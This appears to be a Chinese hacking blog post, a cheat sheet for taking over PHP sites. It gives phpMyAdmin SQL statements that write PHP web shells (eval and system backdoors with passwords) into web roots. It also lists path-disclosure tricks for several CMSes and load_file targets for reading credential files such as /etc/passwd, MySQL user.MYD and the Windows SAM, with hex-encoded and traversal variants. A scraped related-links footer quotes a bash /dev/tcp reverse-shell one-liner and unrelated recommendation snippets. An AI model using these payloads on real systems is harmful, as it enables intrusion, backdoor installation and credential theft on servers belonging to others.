[PhpMyAdmin后台拿Shell]
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
select xiaoma1 from xiaoma INTO OUTFILE 'E:/wamp/www/7.php';
以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php 一句话连接密码:xiaoma

Create TABLE xiaoma (xiaoma1 text NOT NULL);
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
Drop TABLE IF EXISTS xiaoma;

create database wutongyu(这个为数据库名称).
use wutongyu (连接数据库)
create table shell(code text) (建立表shell,字段code为文本型数据)
insert into shell(code) values ('<?php @eval($_POST['c']);?>'); (插入一句话,密码为C)
select * from shell into outfile "D:\\detai\\AppServ\\www\\phpMyAdmin2\\shell.php" (导出shell到绝对路径)

PhpMyAdmin导出WebShell至中文路径
set character_set_client='gbk';
set character_set_connection='gbk';
set character_set_database='gbk';
set character_set_results='gbk';
set character_set_server='gbk';
select '<?php eval($_POST[cmd]);?>' into outfile 'd:\www\网站\mm.php';

读取文件内容:select load_file('E:/xamp/www/s.php');
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'

select load_file('E:/xamp/www/xiaoma.php');
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir

[PHP爆路径方法]
1、单引号爆路径
说明:直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。
www.xxx.com/news.php?id=149′
2、错误参数值爆路径
说明:将要提交的参数值改成错误值,比如-1。-99999单引号被过滤时不妨试试。
www.xxx.com/researcharchive.php?id=-1
3、Google爆路径
说明:结合关键字和site语法搜索出错页面的网页快照,常见关键字有warning和fatal error。注意,如果目标站点是二级域名,site接的是其对应的顶级域名,这样得到的信息要多得多。
Site:xxx.edu.tw warning
Site:xxx.com.tw “fatal error”
4、测试文件爆路径
说明:很多网站的根目录下都存在测试文件,脚本代码通常都是phpinfo()。
www.xxx.com/test.php
www.xxx.com/ceshi.php
www.xxx.com/info.php
www.xxx.com/phpinfo.php
www.xxx.com/php_info.php
www.xxx.com/1.php
5、PhpMyAdmin爆路径
说明:一旦找到phpmyadmin的管理页面,再访问该目录下的某些特定文件,就很有可能爆出物理路径。至于phpmyadmin的地址可以用wwwscan这类的工具去扫,也可以选择google。
1. /phpmyadmin/libraries/lect_lang.lib.php
2./phpMyAdmin/index.php?lang[]=1
3. /phpMyAdmin/phpinfo.php
4. load_file()
5./phpmyadmin/themes/darkblue_orange/layout.inc.php
6./phpmyadmin/libraries/select_lang.lib.php
7./phpmyadmin/libraries/lect_lang.lib.php
8./phpmyadmin/libraries/mcrypt.lib.php
6、配置文件找路径
说明:如果注入点有文件读取权限,就可以手工load_file或工具读取配置文件,再从中寻找路径信息(一般在文件末尾)。各平台下Web服务器和PHP的配置文件默认路径可以上网查,这里列举常见的几个。
Windows:
c:\windows\php.ini php配置文件
c:\windows\system32\inetsrv\MetaBase.xml IIS虚拟主机配置文件
Linux:
/etc/php.ini php配置文件
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf Apache配置文件
/usr/local/apache/conf/httpd.conf

/usr/local/apache/conf/vhosts.conf

/usr/local/apache2/conf/httpd.conf

/usr/local/apache/conf/extra/httpd-vhosts.conf 虚拟目录配置文件

还在为load_file读取不知道该读取什么游泳的信息麽?看看下面

3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录

4、/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件

5、c:/Program Files/Apache Group/Apache/conf/httpd.conf 或C:/apache/conf/httpd.conf 查看WINDOWS系统apache文件

6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.

7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机

8、d:/APACHE/Apache2/conf/httpd.conf

9、C:/Program Files/mysql/my.ini

10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径

11、 c:/windows/system32/inetsrv/MetaBase.xml 查看IIS的虚拟主机配置文件

12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看

13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上

14 、/usr/local/app/apache2/conf/extratpd-vhosts.conf APASHE虚拟主机查看

15、 /etc/sysconfig/iptables 本看防火墙策略

16 、 /usr/local/app/php5 b/php.ini PHP 的相当设置

17 、/etc/my.cnf MYSQL的配置文件

18、 /etc/redhat-release 红帽子的系统版本

19 、C:/mysql/data/mysql/user.MYD 存在MYSQL系统中的用户密码

20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.

21、/usr/local/app/php5 b/php.ini //PHP相关设置

22、/usr/local/app/apache2/conf/extratpd-vhosts.conf //虚拟网站设置

23、c:/Program Files/RhinoSoft.com/Serv-U/ServUDaemon.ini

24、c:/windows/my.ini

25、/etc/issue 显示Linux核心的发行版本信息

26、/etc/ftpuser

27、查看LINUX用户下的操作记录文件.bash_history 或 .bash_profile

28、/etc/ssh/ssh_config

/etc/httpd/logs/error_log
/etc/httpd/logs/error.log 
/etc/httpd/logs/access_log 
/etc/httpd/logs/access.log 
/var/log/apache/error_log 
/var/log/apache/error.log 
/var/log/apache/access_log 
/var/log/apache/access.log 
/var/log/apache2/error_log 
/var/log/apache2/error.log 
/var/log/apache2/access_log 
/var/log/apache2/access.log 
/var/www/logs/error_log 
/var/www/logs/error.log 
/var/www/logs/access_log 
/var/www/logs/access.log 
/usr/local/apache/logs/error_log 
/usr/local/apache/logs/error.log 
/usr/local/apache/logs/access_log 
/usr/local/apache/logs/access.log 
/var/log/error_log 
/var/log/error.log 
/var/log/access_log 
/var/log/access.log
/etc/mail/access
/etc/my.cnf
/var/run/utmp
/var/log/wtmp

../../../../../../../../../../var/log/httpd/access_log 
../../../../../../../../../../var/log/httpd/error_log 
../apache/logs/error.log 
../apache/logs/access.log 
../../apache/logs/error.log 
../../apache/logs/access.log 
../../../apache/logs/error.log 
../../../apache/logs/access.log 
../../../../../../../../../../etc/httpd/logs/acces_log 
../../../../../../../../../../etc/httpd/logs/acces.log 
../../../../../../../../../../etc/httpd/logs/error_log 
../../../../../../../../../../etc/httpd/logs/error.log 
../../../../../../../../../../var/www/logs/access_log 
../../../../../../../../../../var/www/logs/access.log 
../../../../../../../../../../usr/local/apache/logs/access_log 
../../../../../../../../../../usr/local/apache/logs/access.log 
../../../../../../../../../../var/log/apache/access_log 
../../../../../../../../../../var/log/apache/access.log 
../../../../../../../../../../var/log/access_log 
../../../../../../../../../../var/www/logs/error_log 
../../../../../../../../../../var/www/logs/error.log 
../../../../../../../../../../usr/local/apache/logs/error_log 
../../../../../../../../../../usr/local/apache/logs/error.log 
../../../../../../../../../../var/log/apache/error_log 
../../../../../../../../../../var/log/apache/error.log 
../../../../../../../../../../var/log/access_log 
../../../../../../../../../../var/log/error_log 
/var/log/httpd/access_log 
/var/log/httpd/error_log 
../apache/logs/error.log 
../apache/logs/access.log 
../../apache/logs/error.log 
../../apache/logs/access.log 
../../../apache/logs/error.log 
../../../apache/logs/access.log 
/etc/httpd/logs/acces_log 
/etc/httpd/logs/acces.log 
/etc/httpd/logs/error_log 
/etc/httpd/logs/error.log 
/var/www/logs/access_log 
/var/www/logs/access.log 
/usr/local/apache/logs/access_log 
/usr/local/apache/logs/access.log 
/var/log/apache/access_log 
/var/log/apache/access.log 
/var/log/access_log 
/var/www/logs/error_log 
/var/www/logs/error.log 
/usr/local/apache/logs/error_log 
/usr/local/apache/logs/error.log 
/var/log/apache/error_log 
/var/log/apache/error.log 
/var/log/access_log 
/var/log/error_log

WINDOWS下:

c:/boot.ini //查看系统版本 0x633A2F626F6F742E696E690D0A
c:/windows/system32/boot.bat
c:/windows/php.ini //php配置信息 0x633A2F77696E646F77732F7068702E696E69

c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码 0x633A2F77696E646F77732F6D792E696E69

c:/winnt/php.ini 0x633A2F77696E6E742F7068702E696E69

c:/winnt/my.ini 0x633A2F77696E6E742F6D792E696E69

c:/mysql/data/mysql/user.MYD //存储了mysql.user表中的数据库连接密码 0x633A5C6D7973716C5C646174615C6D7973716C5C757365722E4D5944

c:/Program Files/RhinoSoft.com/Serv-U/ServUDaemon.ini //存储了虚拟主机网站路径和密码

0x633A5C50726F6772616D2046696C65735C5268696E6F536F66742E636F6D5C536572762D555C53657276554461656D6F6E2E696E69

c:/Program Files/Serv-U/ServUDaemon.ini 0x633A5C50726F6772616D2046696C65735C536572762D555C53657276554461656D6F6E2E696E69

c:/windows/system32/inetsrv/MetaBase.xml //IIS配置文件

c:/windows/repair/sam //存储了WINDOWS系统初次安装的密码

c:/Program Files/ Serv-U/ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此

c:/Program Files/RhinoSoft.com/ServUDaemon.exe

C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/*.cif 文件

//存储了pcAnywhere的登陆密码

c:/Program Files/Apache Group/Apache/conf /httpd.conf 或C:/apache/conf /httpd.conf //查看 WINDOWS系统apache文件 
0x633A5C50726F6772616D2046696C65735C4170616368652047726F75705C4170616368655C636F6E66205C68747470642E636F6E66

c:/Resin-3.0.14/conf/resin.conf //查看jsp开发的网站 resin文件配置信息. 0x633A2F526573696E2D332E302E31342F636F6E662F726573696E2E636F6E66

c:/Resin/conf/resin.conf 0x633A2F526573696E2F636F6E662F726573696E2E636F6E66

/usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机 0x2F7573722F6C6F63616C2F726573696E2F636F6E662F726573696E2E636F6E66

d:/APACHE/Apache2/conf/httpd.conf 0x643A5C4150414348455C417061636865325C636F6E665C68747470642E636F6E66

C:/Program Files/mysql/my.ini 0x433A5C50726F6772616D2046696C65735C6D7973716C5C6D792E696E69

c:/windows/system32/inetsrv/MetaBase.xml 查看IIS的虚拟主机配置 0x633A5C77696E646F77735C73797374656D33325C696E65747372765C4D657461426173652E786D6C

C:/mysql/data/mysql/user.MYD 存在MYSQL系统中的用户密码 0x433A5C6D7973716C5C646174615C6D7973716C5C757365722E4D5944

LUNIX/UNIX下:

/etc/passwd 0x2F6574632F706173737764

/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件 0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F68747470642E636F6E66

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置 0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66

/usr/local/app/php5/lib/php.ini //PHP相关设置 0x2F7573722F6C6F63616C2F6170702F706870352F6C69622F7068702E696E69

/etc/sysconfig/iptables //从中得到防火墙规则策略 0x2F6574632F737973636F6E6669672F69707461626C657320

/etc/httpd/conf/httpd.conf // apache配置文件 0x2F6574632F68747470642F636F6E662F68747470642E636F6E66

/etc/rsyncd.conf //同步程序配置文件 0x2F6574632F7273796E63642E636F6E66

/etc/my.cnf //mysql的配置文件 0x2F6574632F6D792E636E66

/etc/redhat-release //系统版本 0x2F6574632F7265646861742D72656C65617365

/etc/issue 0x2F6574632F6973737565

/etc/issue.net 0x2F6574632F69737375652E6E6574

/usr/local/app/php5/lib/php.ini //PHP相关设置 0x2F7573722F6C6F63616C2F6170702F706870352F6C69622F7068702E696E69

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置 0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66

/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件 0x2F6574632F68747470642F636F6E662F68747470642E636F6E66

0x2F7573722F6C6F63616C2F61706368652F636F6E662F68747470642E636F6E66

/usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看 0x2F7573722F6C6F63616C2F726573696E2D332E302E32322F636F6E662F726573696E2E636F6E66

/usr/local/resin-pro-3.0.22/conf/resin.conf 同上 0x2F7573722F6C6F63616C2F726573696E2D70726F2D332E302E32322F636F6E662F726573696E2E636F6E66

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看

0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66

/etc/sysconfig/iptables 查看防火墙策略 0x2F6574632F737973636F6E6669672F69707461626C6573

load_file(char(47)) 列出FreeBSD,Sunos系统根目录


7、nginx文件类型错误解析爆路径
说明:这是昨天无意中发现的方法,当然要求Web服务器是nginx,且存在文件类型解析漏洞。有时在图片地址后加/x.php,该图片不但会被当作php文件执行,还有可能爆出物理路径。
www.xxx.com/top.jpg/x.php
8、Other PHP
DeDeCms
/member/templets/menulit.php
plus/paycenter/alipay/return_url.php
plus/paycenter/cbpayment/autoreceive.php
paycenter/nps/config_pay_nps.php
plus/task/dede-maketimehtml.php
plus/task/dede-optimize-table.php
plus/task/dede-upcache.php
WordPress
wp-admin/includes/file.php
wp-content/themes/baiaogu-seo/footer.php
Ecshop商城系统暴路径漏洞文件
/api/cron.php
/wap/goods.php
/temp/compiled/ur_here.lbi.php
/temp/compiled/pages.lbi.php
/temp/compiled/user_transaction.dwt.php
/temp/compiled/history.lbi.php
/temp/compiled/page_footer.lbi.php
/temp/compiled/goods.dwt.php
/temp/compiled/user_clips.dwt.php
/temp/compiled/goods_article.lbi.php
/temp/compiled/comments_list.lbi.php
/temp/compiled/recommend_promotion.lbi.php
/temp/compiled/search.dwt.php
/temp/compiled/category_tree.lbi.php
/temp/compiled/user_passport.dwt.php
/temp/compiled/promotion_info.lbi.php
/temp/compiled/user_menu.lbi.php
/temp/compiled/message.dwt.php
/temp/compiled/admin/pagefooter.htm.php
/temp/compiled/admin/page.htm.php
/temp/compiled/admin/start.htm.php
/temp/compiled/admin/goods_search.htm.php
/temp/compiled/admin/index.htm.php
/temp/compiled/admin/order_list.htm.php
/temp/compiled/admin/menu.htm.php
/temp/compiled/admin/login.htm.php
/temp/compiled/admin/message.htm.php
/temp/compiled/admin/goods_list.htm.php
/temp/compiled/admin/pageheader.htm.php
/temp/compiled/admin/top.htm.php
/temp/compiled/top10.lbi.php
/temp/compiled/member_info.lbi.php
/temp/compiled/bought_goods.lbi.php
/temp/compiled/goods_related.lbi.php
/temp/compiled/page_header.lbi.php
/temp/compiled/goods_script.html.php
/temp/compiled/index.dwt.php
/temp/compiled/goods_fittings.lbi.php
/temp/compiled/myship.dwt.php
/temp/compiled/brands.lbi.php
/temp/compiled/help.lbi.php
/temp/compiled/goods_gallery.lbi.php
/temp/compiled/comments.lbi.php
/temp/compiled/myship.lbi.php
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/includes/modules/cron/auto_manage.php
/includes/modules/cron/ipdel.php
Ucenter爆路径
ucenter\control\admin\db.php
DZbbs
manyou/admincp.php?my_suffix=%0A%0DTOBY57
Z-blog
admin/FCKeditor/editor/dialog/fck%5Fspellerpages/spellerpages/server%2Dscripts/spellchecker.php
Php168爆路径
admin/inc/hack/count.php?job=list
admin/inc/hack/search.php?job=getcode
admin/inc/ajax/bencandy.php?job=do
cache/MysqlTime.txt
PHPcms2008-sp4
注册用户登陆后访问
phpcms/corpandresize/process.php?pic=../images/logo.gif
CMSeasy爆网站路径漏洞
漏洞出现在menu_top.php这个文件中
lib/mods/celive/menu_top.php
/lib/default/ballot_act.php
lib/default/special_act.php

爆路径写后门拿shell的一些姿势的更多相关文章

  1. phpmyadmin后台4种拿shell方法 && php爆路径大法

    php后台拿shell要知道php的路径,文章下面将讲诉爆php路径的方法!!! 方法一: CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL ); IN ...

  2. (六)动手写第一个shell

    1.编辑器.编译器.运行方法(脚本的3种执行方法)(1)shell程序是文本格式的,只要是文本编辑器都可以.但是因为我们的shell是要在linux系统下运行的,所以换行符必须是'\n',而windo ...

  3. 写你的shell,其实很简单[架构篇]

    引语:我本人以前并没有写过shell脚本,也许是因为懒,也许是没有被逼到要去写shell的地步.但是,前段时间,工作需求,要求重新跑几个月的脚本,这些脚本是每天定时进行跑的,而且每天是好几个脚本一起关 ...

  4. msf生成后门拿shell

    0X01简介 这里我本来想学习 msf利用漏洞反弹shell的 但是 没有靶机....等找了靶机在弄吧 kali 172.18.5.118 靶机  172.18.5.240 先尝试能不能ping通 好 ...

  5. golang写的反弹shell(自作孽不可活,切记,切记!)

    仅作安全研究 package main import ( "os/exec" "go-pop3" "log" "strings&q ...

  6. java指定路径写、读文件

    package com.util; import java.io.BufferedReader; import java.io.BufferedWriter; import java.io.File; ...

  7. 利用数据库拿shell的一些姿势

    0x01.利用MySQL命令导出getshell 利用条件: 1.拥有网站的写入权限 2.Secure_file_priv参数为空或者为指定路径 3.知道网站的绝对路径 方法: 通过into outf ...

  8. 写启动界面Splash的正确姿势,解决启动白屏(转)

    原文链接:http://www.jianshu.com/p/cd6ef8d3d74d 从我学习写第一个android项目以来,我都是这样写着启动界面: 在里面做一些事,比如:第一次启动时拷贝数据. 然 ...

  9. 反弹shell的十种姿势

    bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ,注意某些linux不支持 perl版本: perl -e 'use Sock ...

随机推荐

  1. 学习Oracle数据库入门到精通教程资料合集

    任何大型信息系统,都需要有数据库管理系统作为支撑.其中,Oracle以其卓越的性能获得了广泛的应用.本合集汇总了学习Oracle数据库从入门到精通的30份教程资料. 资料名称 下载地址 超详细Orac ...

  2. HTTP Status 500 – Internal Server Error

    明明硬盘中存在users.xml,但是提示:系统找不到指定的路径. 解决办法: 设置String的编码格式 realpath = URLDecoder.decode(realpath, "U ...

  3. 创建podspec文件,为自己的项目添加pod支持

    Cocoapods作为iOS开发的包管理器,给我们的开发带来了极大的便利,而且越来越多的第三方类库支持Pod,可以通过Pod傻瓜式的集成到自己的工程中,那么问题来了,我自己也有一系列的小工具类,怎么让 ...

  4. "首页添加至购物车,TabBar显示购物车的数量"实现

    今天学习别人的项目源码的时候,看到这样的一种实现功能:首页添加至购物车,TabBar显示购物车的数量....想到以前没有做过,这里学习了,记录一下: 实现的效果图如下: 当点击首页添加至购物的操作的时 ...

  5. js中的堆内存和栈内存

    我们常常会听说什么栈内存.堆内存,那么他们到底有什么区别呢,在js中又是如何区分他们的呢,今天我们来看一下. 一.栈内存和堆内存的区分 一般来说,栈内存主要用于存储各种基本类型的变量,包括Boolea ...

  6. linux下安装jdk8并且配置环境变量

    su回车进入root账户 查看是否安装过jdk8使用命令 # rpm -qa | grep -i jdk 创建文件夹用来存放下载的jdk使用命令 # mkdir -p /usr/local/src/j ...

  7. CTF攻防练习之综合训练1

    主机:192.168.32.152 靶机:192.168.32.166 首先使用nmap,nikto -host ,dirb扫描,探测靶场开放了 21,22,80d端口已经发现有一下关键信息 进入lo ...

  8. Spring体系

    1.Spring简介 Spring是一个轻量级Java开发框架,最早有Rod Johnson创建,目的是为了解决企业级应用开发的业务逻辑层和其他各层的耦合问题.它是一个分层的JavaSE/JavaEE ...

  9. 一加手机2 进入recovery 模式无法挂载USB存储器通过命令窗口上传ROM镜像

    试过3.0.3-0和3.0.3-1的recovery都无法使用“挂载USB大容量存储器”模式,这肯定让很多清掉系统(就是system分区)的小伙伴无力吐槽,因为这样子rom就无法在rec里面从电脑拷到 ...

  10. 汉诺塔问题的C++实现

    有三根杆子A,B,C.A杆上有N个(N>1)穿孔圆环,盘的尺寸由下到上依次变小.要求按下列规则将所有圆盘移至C杆:每次只能移动一个圆盘:大盘不能叠在小盘上面.如何移?最少要移动多少次? 原理可参 ...